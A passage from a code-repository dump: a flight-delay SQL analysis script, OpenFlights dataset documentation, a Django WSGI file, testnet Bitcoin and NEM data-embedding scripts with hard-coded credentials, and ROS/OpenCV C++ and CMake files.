range (0, 2400, 100):\r\n cmd = \"SELECT COUNT(*) FROM information where dreal >= %d and dreal < %d and cond > 0 and date = %d\"%(dreal, dreal+100, day)\r\n cur.execute(cmd)\r\n cnt_delay[str(dreal)] = cur.fetchone()[0]\r\n all_day_delay[str(dreal)] += cnt_delay[str(dreal)]\r\n every_day_delay[str(day)] = cnt_delay\r\n\r\nfor day in range (20180901, 20180908):\r\n cnt_delay = {key:0 for key in timezone}\r\n for dreal in range (0, 2400, 100):\r\n cmd = \"SELECT COUNT(*) FROM information where dreal >= %d and dreal < %d and cond > 0 and date = %d\"%(dreal, dreal+100, day)\r\n cur.execute(cmd)\r\n cnt_delay[str(dreal)] = cur.fetchone()[0]\r\n all_day_delay[str(dreal)] += cnt_delay[str(dreal)]\r\n every_day_delay[str(day)] = cnt_delay\r\n\r\ndef generate_every_day_delay(every_day_delay, timezone):\r\n f = open(r\"data\\every_day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var every_day_delay = \\'{\\\\\\n\")\r\n print(every_day_delay.keys())\r\n for day in every_day_delay.keys():\r\n tmp = \"\\\"%s\\\":[\"%(day)\r\n for tz in timezone:\r\n tmp += '{\\\"name\\\":\\\"%s\\\", \\\"value\\\":%d},'%(tz, every_day_delay[day][tz])\r\n tmp += '],\\\\\\n'\r\n f.writelines(tmp)\r\n f.writelines(\"}\\';\")\r\n\r\n\r\n\r\ndef generate_all_day_delay(all_day_delay, timezone):\r\n f = open(r\"data\\all_day_delay.js\", 'wt', encoding='utf-8')\r\n f.writelines(\"var all_day_delay = [\")\r\n for tz in timezone:\r\n f.writelines('%d, '%(all_day_delay[tz]))\r\n f.writelines(\"];\")\r\n \r\nprint(timezone)\r\ngenerate_all_day_delay(all_day_delay, timezone)"
},
{
"alpha_fraction": 0.6817119121551514,
"alphanum_fraction": 0.7041734457015991,
"avg_line_length": 80.58381652832031,
"blob_id": "14f9d3f4001a9cb227d0f5fc918bbce25179123b",
"content_id": "20bff89b221135a6d974796111290d64313e5aff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14113,
"license_type": "no_license",
"max_line_length": 623,
"num_lines": 173,
"path": "/data/aboutTheData.md",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "# Airport, airline and route data\n\n## Airport database\n\n[](https://openflights.org/demo/openflights-apdb-2048.png)\n(click to enlarge)\n\nAs of January 2017, the OpenFlights Airports Database contains **over 10,000** airports, train stations and ferry terminals spanning the globe, as shown in the map above. Each entry contains the following information:\n\n| | |\n| --------------------- | ------------------------------------------------------------ |\n| Airport ID | Unique OpenFlights identifier for this airport. |\n| Name | Name of airport. May or may not contain the **City** name. |\n| City | Main city served by airport. May be spelled differently from **Name**. |\n| Country | Country or territory where airport is located. See [countries.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/countries.dat) to cross-reference to ISO 3166-1 codes. |\n| IATA | 3-letter IATA code. Null if not assigned/unknown. |\n| ICAO | 4-letter ICAO code. Null if not assigned. |\n| Latitude | Decimal degrees, usually to six significant digits. Negative is South, positive is North. |\n| Longitude | Decimal degrees, usually to six significant digits. Negative is West, positive is East. |\n| Altitude | In feet. |\n| Timezone | Hours offset from UTC. Fractional hours are expressed as decimals, eg. India is 5.5. |\n| DST | Daylight savings time. One of E (Europe), A (US/Canada), S (South America), O (Australia), Z (New Zealand), N (None) or U (Unknown). *See also: Help: Time* |\n| Tz database time zone | Timezone in [\"tz\" (Olson) format](http://en.wikipedia.org/wiki/Tz_database), eg. \"America/Los_Angeles\". |\n| Type | Type of the airport. Value \"airport\" for air terminals, \"station\" for train stations, \"port\" for ferry terminals and \"unknown\" if not known. *In airports.csv, only type=airport is included.* |\n| Source | Source of this data. \"OurAirports\" for data sourced from [OurAirports](http://ourairports.com/data/), \"Legacy\" for old data not matched to OurAirports (mostly DAFIF), \"User\" for unverified user contributions. *In airports.csv, only source=OurAirports is included.* |\n\nThe data is UTF-8 (Unicode) encoded.\n\n*Note*: Rules for daylight savings time change from year to year and from country to country. The current data is an approximation for 2009, built on a country level. Most airports in DST-less regions in countries that generally observe DST (eg. AL, HI in the USA, NT, QL in Australia, parts of Canada) are marked incorrectly.\n\n#### Sample entries\n\n```\n507,\"London Heathrow Airport\",\"London\",\"United Kingdom\",\"LHR\",\"EGLL\",51.4706,-0.461941,83,0,\"E\",\"Europe/London\",\"airport\",\"OurAirports\"\n26,\"Kugaaruk Airport\",\"Pelly Bay\",\"Canada\",\"YBB\",\"CYBB\",68.534401,-89.808098,56,-7,\"A\",\"America/Edmonton\",\"airport\",\"OurAirports\"\n3127,\"Pokhara Airport\",\"Pokhara\",\"Nepal\",\"PKR\",\"VNPK\",28.200899124145508,83.98210144042969,2712,5.75,\"N\",\"Asia/Katmandu\",\"airport\",\"OurAirports\"\n8810,\"Hamburg Hbf\",\"Hamburg\",\"Germany\",\"ZMB\",\\N,53.552776,10.006683,30,1,\"E\",\"Europe/Berlin\",\"station\",\"User\"\n```\n\nTry it out: [Airport Search](https://openflights.org/html/apsearch) (new window)\n\n*Note*: The Airport Search window above is a part of [OpenFlights](http://openflights.org/). You will not be able to add or edit airports unless you are logged in.\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a very straightforward CSV (comma-separated value) file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [airports.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airports.dat) (Airports only, high quality)\n\nDownload: [airports-extended.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airports-extended.dat) (Airports, train stations and ferry terminals, including user contributions)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work, which is why it would cost you *over one thousand dollars* to buy it from a commercial supplier. We need your support to keep this database up-to-date: just click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like a itemized receipt for business expense or tax purposes. \t\t\t\n\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/airports.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of routes at the airport), do not hesitate to [contact us](https://openflights.org/about.html).\n\nIf you'd like an even more thorough database, with extensive coverage of airstrips, heliports and other places of less interest for commercial airline frequent flyers, do check out [OurAirports](http://ourairports.com/), whose public domain database covers over 40,000 places to fly from.\n\n## Airline database\n\nAs of January 2012, the OpenFlights Airlines Database contains **5888** airlines. Each entry contains the following information:\n\n| Airline ID | Unique OpenFlights identifier for this airline. |\n| ---------- | ------------------------------------------------------------ |\n| Name | Name of the airline. |\n| Alias | Alias of the airline. For example, All Nippon Airways is commonly known as \"ANA\". |\n| IATA | 2-letter IATA code, if available. |\n| ICAO | 3-letter ICAO code, if available. |\n| Callsign | Airline callsign. |\n| Country | Country or territory where airline is incorporated. |\n| Active | \"Y\" if the airline is or has until recently been operational, \"N\" if it is defunct. This field is *not* reliable: in particular, major airlines that stopped flying long ago, but have not had their IATA code reassigned (eg. Ansett/AN), will incorrectly show as \"Y\". |\n\nThe data is ISO 8859-1 (Latin-1) encoded. The special value **\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\n*Notes*: Airlines with null codes/callsigns/countries generally represent user-added airlines. Since the data is intended primarily for current flights, defunct IATA codes are generally not included. For example, \"Sabena\" is not listed with a SN IATA code, since \"SN\" is presently used by its successor Brussels Airlines.\n\n#### Sample entries\n\n```\n324,\"All Nippon Airways\",\"ANA All Nippon Airways\",\"NH\",\"ANA\",\"ALL NIPPON\",\"Japan\",\"Y\"\n412,\"Aerolineas Argentinas\",\\N,\"AR\",\"ARG\",\"ARGENTINA\",\"Argentina\",\"Y\"\n413,\"Arrowhead Airways\",\\N,\"\",\"ARH\",\"ARROWHEAD\",\"United States\",\"N\"\n```\n\nTry it out: [Airline Search](https://openflights.org/html/alsearch) (new window)\n\n*Note*: The Airline Search window above is a part of [OpenFlights](http://openflights.org/). You will not be able to view, add or edit airline details unless you are logged in.\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights/) as a very straightforward CSV (comma-separated value) file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [airlines.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/airlines.dat) (~400 KB)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work. We need your support to keep this database up-to-date: just click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like a itemized receipt for business expense or tax purposes.\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/airlines.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of flights by airline), do not hesitate to [contact us](https://openflights.org/about.html).\n\n## Route database\n\n[](https://openflights.org/demo/openflights-routedb-2048.png)\n(click to enlarge)\n\nWarning: The third-party that OpenFlights uses for route data ceased providing updates in June 2014. The current data is of historical value only.\n\nAs of June 2014, the OpenFlights/Airline Route Mapper Route Database contains **67663** routes between **3321** airports on **548** airlines spanning the globe, as shown in the map above. Each entry contains the following information:\n\n| Airline | 2-letter (IATA) or 3-letter (ICAO) code of the airline. |\n| ---------------------- | ------------------------------------------------------------ |\n| Airline ID | Unique OpenFlights identifier for airline (see [Airline](https://openflights.org/data.html#airline)). |\n| Source airport | 3-letter (IATA) or 4-letter (ICAO) code of the source airport. |\n| Source airport ID | Unique OpenFlights identifier for source airport (see [Airport](https://openflights.org/data.html#airport)) |\n| Destination airport | 3-letter (IATA) or 4-letter (ICAO) code of the destination airport. |\n| Destination airport ID | Unique OpenFlights identifier for destination airport (see [Airport](https://openflights.org/data.html#airport)) |\n| Codeshare | \"Y\" if this flight is a codeshare (that is, not operated by *Airline*, but another carrier), empty otherwise. |\n| Stops | Number of stops on this flight (\"0\" for direct) |\n| Equipment | 3-letter codes for plane type(s) generally used on this flight, separated by spaces |\n\nThe data is ISO 8859-1 (Latin-1) encoded. The special value **\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\nNotes:\n\n- Routes are directional: if an airline operates services from A to B and from B to A, both A-B and B-A are listed separately.\n- Routes where one carrier operates both its own and codeshare flights are listed only once.\n\n#### Sample entries\n\n```\nBA,1355,SIN,3316,LHR,507,,0,744 777\nBA,1355,SIN,3316,MEL,3339,Y,0,744\nTOM,5013,ACE,1055,BFS,465,,0,320\n```\n\nRoute maps for airports and airlines can be viewed by [searching for their names or code in the website's Search box](http://openflights.org/blog/2009/07/15/airline-route-maps-launched-metric-distances-available/); alternatively, check out the [alphabetical list of all covered airports and airlines](https://openflights.org/html/route-maps).\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a comma-delimited file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [routes.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/routes.dat) (~2 MB)\n\nCreating and maintaining this database has required and continues to require an *immense amount* of work. We need your support to keep this database up-to-date: just click on the PayPal link to the right (Visa, MasterCard, American Express and Discover also accepted). We suggest **US$50**, but any amount at all is welcome, and you may use the data for free if you feel that you are unable to pay. If you do donate, please specify in the comments if you would like a itemized receipt for business expense or tax purposes.\n\nThe GitHub copy is only a sporadically updated static snapshot of the live OpenFlights database (see [revision log](https://github.com/jpatokal/openflights/commits/master/data/routes.dat)). If you would like an up-to-the-minute copy, or you would like your data filtered by any information available to us (eg. number of routes by airline), do not hesitate to [contact us](https://openflights.org/about.html).\n\n## Plane database\n\nThe OpenFlights plane database contains a curated selection of **173** passenger aircraft with IATA and/or ICAO codes, covering the vast majority of flights operated today and commonly used in flight schedules and reservation systems. Each entry contains the following information:\n\n| Name | Full name of the aircraft. |\n| --------- | ----------------------------------------------------- |\n| IATA code | Unique three-letter IATA identifier for the aircraft. |\n| ICAO code | Unique four-letter ICAO identifier for the aircraft. |\n\nThe data is UTF-8 encoded. The special value **\\N** is used for \"NULL\" to indicate that no value is available, and is understood automatically by MySQL if imported.\n\nNotes:\n\n- Aircraft with IATA but without ICAO codes are generally aircraft classes: for example, IATA \"747\" can be any type of Boeing 747, whereas IATA \"744\"/ICAO \"B744\" is specifically a Boeing 747-400.\n\n#### Sample entries\n\n```\n\"Boeing 787\",\"787\",\\N\n\"Boeing 787-10\",\"78J\",\"B78X\"\n\"Boeing 787-8\",\"788\",\"B788\"\n```\n\n#### Download\n\nTo download the current data dump from [GitHub](https://github.com/jpatokal/openflights) as a comma-delimited file, suitable for use in spreadsheets etc, simply click below:\n\nDownload: [planes.dat](https://raw.githubusercontent.com/jpatokal/openflights/master/data/planes.dat) (~5 KB)"
}
] | 12 |
ataulmaola/blog_any
|
https://github.com/ataulmaola/blog_any
|
cdd1acdd59ac70b636d48c0f13100bb6634e281b
|
8b704b38beb433b889ab643a02b19dad15a862ca
|
bae47626166131fd34f10519479b1621981d186a
|
refs/heads/master
| 2023-01-11T05:27:26.564345 | 2017-05-01T01:05:31 | 2017-05-01T01:05:31 | 89,884,557 | 0 | 0 | null | 2017-04-30T23:59:06 | 2017-05-01T00:20:19 | 2022-12-26T20:00:11 |
JavaScript
|
[
{
"alpha_fraction": 0.5148902535438538,
"alphanum_fraction": 0.7178683280944824,
"avg_line_length": 17.764705657958984,
"blob_id": "9da772c03c21d81b1042bd400de16fe885af9753",
"content_id": "20535b9166da95f3874f10172dde2fa5ddf267fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1276,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 68,
"path": "/requirements.txt",
"repo_name": "ataulmaola/blog_any",
"src_encoding": "UTF-8",
"text": "Django==1.10.6\nPAM==0.4.2\nPillow==2.3.0\nPmw==1.3.2\nPyDispatcher==2.0.5\nPyOpenGL==3.0.2\nPygments==2.2.0\nScrapy==1.3.3\nTwisted-Core==13.2.0\nTwisted-Web==13.2.0\nadium-theme-ubuntu==0.3.4\napt-xapian-index==0.45\nargparse==1.2.1\nchardet==2.0.1\ncolorama==0.2.5\ncommand-not-found==0.3\ncssselect==1.0.1\ndebtagshw==0.1\ndefer==1.0.6\ndirspec==13.10\ndj-database-url==0.4.2\ndjango-bootstrap3==8.2.2\ndocutils==0.13.1\nduplicity==0.6.23\ngunicorn==19.7.1\nhtml5lib==0.999\nhttplib2==0.8\nlockfile==0.8\nlxml==3.3.3\nnumpy==1.8.2\noauthlib==0.6.1\noneconf==0.3.7.14.04.1\nparsel==1.1.0\npexpect==3.1\npick-colour-picker==1.0\npiston-mini-client==0.7.5\npowerline-status==2.5.2.dev9999-git.5fa504118ee470e9cc9c8665515b77900ce5821e\npyOpenSSL==0.13\npycrypto==2.6.1\npycups==1.9.66\npycurl==7.19.3\npyenchant==1.6.5\npygame==1.9.1release\npygobject==3.12.0\npyserial==2.6\npysheng==0.1\npysmbc==1.0.14.1\npython-apt==0.9.3.5ubuntu2\npython-debian==0.1.21-nmu2ubuntu2\npyxdg==0.25\nqueuelib==1.4.2\nreportlab==3.0\nrequests==2.2.1\nservice-identity==16.0.0\nsessioninstaller==0.0.0\nsix==1.5.2\nsoftware-center-aptd-plugins==0.0.0\nswampy==2.1.7\nsystem-service==0.1.6\nunity-lens-photos==1.0\nurllib3==1.7.1\nvirtualenv==15.1.0\nw3lib==1.17.0\nwheel==0.24.0\nwhitenoise==3.3.0\nwsgiref==0.1.2\nxdiagnose==3.6.3build2\nzope.interface==4.0.5\n"
},
{
"alpha_fraction": 0.8166189193725586,
"alphanum_fraction": 0.8166189193725586,
"avg_line_length": 22.33333396911621,
"blob_id": "9ae19c312763a97942b6a38b4cdb54f606636651",
"content_id": "d437696c22e84c115363171507686c5ba515f366",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/sample_wsgi.py",
"repo_name": "ataulmaola/blog_any",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\npath='/home/pythonanyusername/projectname'\n\nif path not in sys.path:\n\tsys.path.append(path)\n\nos.environ['DJANGO_SETTINGS_MODULE']='projectname.settings'\n\nfrom django.core.wsgi import get_wsgi_application\n\nfrom django.contrib.staticfiles.handlers import StaticFilesHandler\n\napplication=StaticFilesHandler(get_wsgi_application())"
}
] | 2 |
wlyuen2000/devsample
|
https://github.com/wlyuen2000/devsample
|
244feef67a25acb1fe7aabc1562482e9d483b3bb
|
2ae05b5e4ef0b7e5f2afc4f749f3273337915206
|
51a9edbc79e584e0b772cd59aaa45085bd76086c
|
refs/heads/master
| 2020-04-10T01:01:36.364813 | 2018-03-07T16:46:16 | 2018-03-07T16:46:16 | 124,252,212 | 0 | 0 | null | 2018-03-07T15:02:00 | 2018-03-07T15:38:13 | 2018-03-07T15:45:18 |
Python
|
[
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 23,
"blob_id": "78b3b324daa0f6f0c7142f725e897f5f04e5ba5f",
"content_id": "559cb02a5eb1583aee8b268bf8f816754caa684d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/readme.md",
"repo_name": "wlyuen2000/devsample",
"src_encoding": "UTF-8",
"text": "Program to practice git\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 12,
"blob_id": "cbdbf7601cc40190a1c27f25c8d7f4a5a749b88b",
"content_id": "6038f5acdf1d71d29d8ebe56fa04db0dc9dae979",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/src/mysrc.py",
"repo_name": "wlyuen2000/devsample",
"src_encoding": "UTF-8",
"text": "this is a src in master\n\n\nThis is rebase merge test\n"
}
] | 2 |
tom0927fuj/testnem
|
https://github.com/tom0927fuj/testnem
|
471e5b0c2ec0404c8e727c223187215dcd2b4cd3
|
4c8af132e484f8b834dd59f58da5202dd048d6c0
|
45eddba165460cc555cf08ce66eaf6cc4348772e
|
refs/heads/master
| 2021-05-16T21:00:05.214098 | 2020-04-16T02:55:51 | 2020-04-16T02:55:51 | 250,467,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5899471044540405,
"alphanum_fraction": 0.6243386268615723,
"avg_line_length": 32.35293960571289,
"blob_id": "31acf9ffdf046205e48055063deb1cc95f7bf5b8",
"content_id": "3a04c1107708ebf5d889def5c53728a779fb7684",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2300,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 68,
"path": "/main2.py",
"repo_name": "tom0927fuj/testnem",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException\nfrom decimal import Decimal, getcontext\nfrom binascii import hexlify\nfrom pprint import pprint\n\ndef main():\n rpc_user = 'rpcuser'\n rpc_password = 'Cq@q7K&pYX3e4eCM!7'\n rpc = AuthServiceProxy(f'http://{rpc_user}:{rpc_password}@127.0.0.1:18332/')\n #rpc = AuthServiceProxy(f'http://{rpc_user}:{rpc_password}@172.17.0.2:18332/')\n print(rpc.getinfo())\n best_block_hash = rpc.getbestblockhash()\n print(rpc.getblock(best_block_hash))\n blhash = rpc.getblockhash(0) #blhashはブロックのhash文字列\n bl = rpc.getblock(blhash) #blはブロック情報\n print(bl)\n dummy_address = '2MudgRfNaaw96kqAWziZ5JGsPbo2pzQp7Jy'\n change_address = '2NAVrak22jX3DQyDqnoqdm5ZTak1RgXWPzo'\n\n filename = 'mark_token.btc.json'\n url='https://drive.google.com/file/d/1ZR6Q5sCM_acUpPy7s3d9GJH8I2Plh4FI/view?usp=sharing'\n\n with open(filename, 'rb') as f:\n data2 = f.read()\n hashdata=hashlib.sha256(data2).hexdigest()\n js={'file_hash':hashdata,'url':url}\n data=json.dumps(js).encode(\"UTF-8\")\n\n\n while True:\n if len(data) >= 80:\n buffer = data[:80]\n data = data[80:]\n elif len(data) == 0:\n break\n else:\n buffer = data\n data = b''\n\n first_unspent = rpc.listunspent()[0]\n txid = first_unspent['txid']\n vout = first_unspent['vout']\n input_amount = first_unspent['amount']\n SATOSHI = Decimal(\"0.00000001\")\n change_amount = input_amount - Decimal(\"0.005\") - SATOSHI\n\n tx = rpc.createrawtransaction([{\"txid\": txid, \"vout\": vout}],[{change_address: change_amount}, {'data': hexlify(buffer).decode('utf-8')}, ])\n tx = rpc.signrawtransactionwithwallet(tx)['hex']\n rpc.sendrawtransaction(tx)\n\n block_hash = rpc.generatetoaddress(1, change_address)[0]\n block = rpc.getblock(block_hash)\n txs = block['tx'][1:]\n\n print(f'# of txs: {len(txs)}')\n pprint(txs)\n\n for tx_hash in txs:\n raw_tx = rpc.gettransaction(tx_hash)['hex']\n decoded_tx = rpc.decoderawtransaction(raw_tx)\n # pprint(decoded_tx)\n print(decoded_tx['vout'][1]['scriptPubKey']['asm'])\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5108645558357239,
"alphanum_fraction": 0.5709662437438965,
"avg_line_length": 23.03333282470703,
"blob_id": "1c557b4137527869d5e2b5d8b3e3437ffe03b1c9",
"content_id": "7d0046dab6f80165c34ff9750d297431c6c55ccc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2183,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 90,
"path": "/test.py",
"repo_name": "tom0927fuj/testnem",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom nemnis import Client, explain_status\nimport json\nfrom decimal import Decimal, getcontext\nfrom binascii import hexlify\nfrom pprint import pprint\n\n\n\ndef main():\n nis = Client()\n hb = nis.heartbeat()\n\n senderAddress=\"TCPWWG327BPLTSB62733CWEV3L37INFRZ4A6TKUR\"\n pubkey=\"2e884d52108390c45511a4f2e3d734769645513e23883646e8f31d99a068f6a5\"\n prikey=\"5a82f55131b407aa6e295688a16e801cba922b0346a79e23c3348fc84893ff61\"\n\n status = nis.status()\n timestamp=nis.call('GET', 'time-sync/network-time').json()['sendTimeStamp']\n recipient=\"TAJQJIVTOOZNBYSVWDXUEZESPLO6AL456NBBO24L\"\n version=-1744830463\n type=257\n\n filename = 'mark_token.nem.json'\n with open(filename, 'rb') as f:\n data = f.read()\n print(len(data))\n\n while True:\n if len(data) >= 1024:\n buffer = data[:1024]\n data = data[1024:]\n elif len(data) == 0:\n break\n else:\n buffer = data\n data = b''\n microFee=((int)(len(buffer)/32)+1)*1000000*0.05\n microAmount=0\n print(len(buffer))\n print(microFee)\n exit()\n txObj = {'timeStamp': timestamp,\n 'amount': microAmount,\n 'fee': microFee,\n 'recipient': recipient,\n 'type': 257, #transter transaction\n 'deadline': deadline,\n 'message': {\n 'type': 1, #暗号化なし 1 暗号化あり 2\n 'payload': hexlify(buffer).decode('utf-8')\n },\n 'version': version,\n 'signer': pubkey\n }\n\n exit()\n print(status.json())\n\n # you can use following function to get verbose message for status\n print(explain_status(status.json()))\n\n print(hb.status_code)\n\n print(hb.json())\n\n acc = nis.account.get('TAJQJIVTOOZNBYSVWDXUEZESPLO6AL456NBBO24L')\n\n print(acc.status_code)\n\n print(acc.json())\n\n acc2 = nis.account.get('TCPWWG327BPLTSB62733CWEV3L37INFRZ4A6TKUR')\n\n print(acc2.status_code)\n\n print(acc2.json())\n\n ### You can connect to other nodes just by passing it address:\n new_client = Client('http://127.0.0.1:7890')\n\n new_hb = new_client.heartbeat()\n\n print(new_hb.status_code)\n\n print(new_hb.json())\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
oussamaabdulhay/davis_corner
|
https://github.com/oussamaabdulhay/davis_corner
|
7d56a3df4936d7f9a0e750a791f68524248ce263
|
785996a431af57e41cc102030418f569d83fd31f
|
f6a27ad403b3402f3c641fc83e8458acbe226347
|
refs/heads/master
| 2023-01-24T01:49:25.486030 | 2020-12-10T07:25:02 | 2020-12-10T07:25:02 | 312,803,314 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6197017431259155,
"alphanum_fraction": 0.6361852288246155,
"avg_line_length": 30.837499618530273,
"blob_id": "d06fd022f962f7b5d111dd9df9b6b7a737e060bf",
"content_id": "9747023043f65648415ff35ad8e2454420ed750d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2548,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 80,
"path": "/src/rotation_accelerometer.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"rotation_accelerometer.hpp\"\nusing namespace std;\n\nrotation_accelerometer::rotation_accelerometer()\n{\n this->_input_port_0 = new InputPort(ports_id::IP_0_IMU, this);\n this->_input_port_1 = new InputPort(ports_id::IP_1_ROLL, this);\n this->_input_port_2 = new InputPort(ports_id::IP_2_PITCH, this);\n this->_input_port_3 = new InputPort(ports_id::IP_3_YAW, this);\n this->_output_port = new OutputPort(ports_id::OP_0_DATA, this);\n _ports = {_input_port_0, _input_port_1,_input_port_2,_input_port_3, _output_port};\n}\n\nrotation_accelerometer::~rotation_accelerometer()\n{\n}\n\n\nvoid rotation_accelerometer::process(DataMsg* t_msg, Port* t_port) {\n Vector3DMsg *provider = (Vector3DMsg *)t_msg;\n if(t_port->getID() == ports_id::IP_0_IMU)\n {\n accelerometer_data.x = provider->data.x;\n accelerometer_data.y = provider->data.y;\n accelerometer_data.z = provider->data.z;\n \n // std::cout<<\"x=\"<<provider->data.x<<\"\\n\";\n // std::cout<<\"y=\"<<provider->data.y<<\"\\n\";\n // std::cout<<\"z=\"<<provider->data.z<<\"\\n\";\n \n }\n else if(t_port->getID() == ports_id::IP_1_ROLL)\n { \n drone_orientation.x =provider->data.x;\n }\n else if(t_port->getID() == ports_id::IP_2_PITCH)\n { \n drone_orientation.y =provider->data.x;\n update_rotation_matrices();\n \n }\n else if(t_port->getID() == ports_id::IP_3_YAW)\n { \n drone_orientation.z =provider->data.x;\n }\n}\n\n\n\nvoid rotation_accelerometer::update_rotation_matrices() \n{\n MatrixXd R_inertia(3, 3);\n\n R_inertia = R_drone_origin.Update(drone_orientation);\n\n R_inertia=R_inertia.inverse();\n\n rotated_unit_vector = Update_accelerometer_vector(R_inertia);\n\n}\n\nVector3D<float> rotation_accelerometer::Update_accelerometer_vector(MatrixXd R_inertia)\n{\n Vector3D<float> t_results;\n t_results.x = accelerometer_data.x * R_inertia(0, 0) + accelerometer_data.y * R_inertia(0, 1) + accelerometer_data.z * R_inertia(0, 2);\n t_results.y = accelerometer_data.x * R_inertia(1, 0) + accelerometer_data.y * R_inertia(1, 1) + accelerometer_data.z * R_inertia(1, 2);\n t_results.z = accelerometer_data.x * R_inertia(2, 0) + accelerometer_data.y * R_inertia(2, 1) + accelerometer_data.z * R_inertia(2, 2);\n\n rotated_acceleration.x=t_results.x;\n rotated_acceleration.y =t_results.y;\n rotated_acceleration.z=t_results.z;\n\n\n\n Vector3DMsg point_msg;\n point_msg.data = rotated_acceleration;\n this->_output_port->receiveMsgData(&point_msg);\n\n return t_results;\n}\n\n"
},
{
"alpha_fraction": 0.7331042289733887,
"alphanum_fraction": 0.736540675163269,
"avg_line_length": 17.7608699798584,
"blob_id": "1eff062ba1ecc23185d56ecd8c4ffc441b5ba9fd",
"content_id": "78179ba78798c6d6a51435915a4063fbcedf5e6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 46,
"path": "/CMakeLists.txt",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.3)\nproject(davis_corner)\n\n\nfind_package(catkin REQUIRED COMPONENTS\n roscpp\n std_msgs\n cv_bridge\n image_transport\n sensor_msgs\n dvs_msgs\n message_generation\n hear_architecture\n hear_ros_bridge\n\n)\n\nfind_package(OpenCV REQUIRED)\n\n\nadd_message_files(FILES\n Corners.msg\n)\n\ngenerate_messages(\n DEPENDENCIES\n std_msgs\n)\n\n\n\ncatkin_package(\nINCLUDE_DIRS LIBRARIES rosopencv_t CATKIN_DEPENDS hear_ros_bridge cv_bridge image_transport roscpp sensor_msgs CATKIN_DEPENDS message_runtime std_msgs )\n\ninclude_directories(\n ${CMAKE_CURRENT_SOURCE_DIR}/include\n ${catkin_INCLUDE_DIRS}\n)\n\nFILE(GLOB SOURCE_FILES *.hpp *.cpp *.h\n ${CMAKE_CURRENT_SOURCE_DIR}/src/*.cpp\n )\n\nadd_executable(ball_detector_node src/main.cpp ${SOURCE_FILES})\n\ntarget_link_libraries(ball_detector_node ${catkin_LIBRARIES} ${OpenCV_LIBRARIES})\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.566292941570282,
"alphanum_fraction": 0.6098949909210205,
"avg_line_length": 33.47239303588867,
"blob_id": "c9edb235facaba6f98ac99a1b760a4d47b2ba430",
"content_id": "0edbdbce38aaf6447b61cfa8b87b3ffda0b90746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5619,
"license_type": "no_license",
"max_line_length": 128,
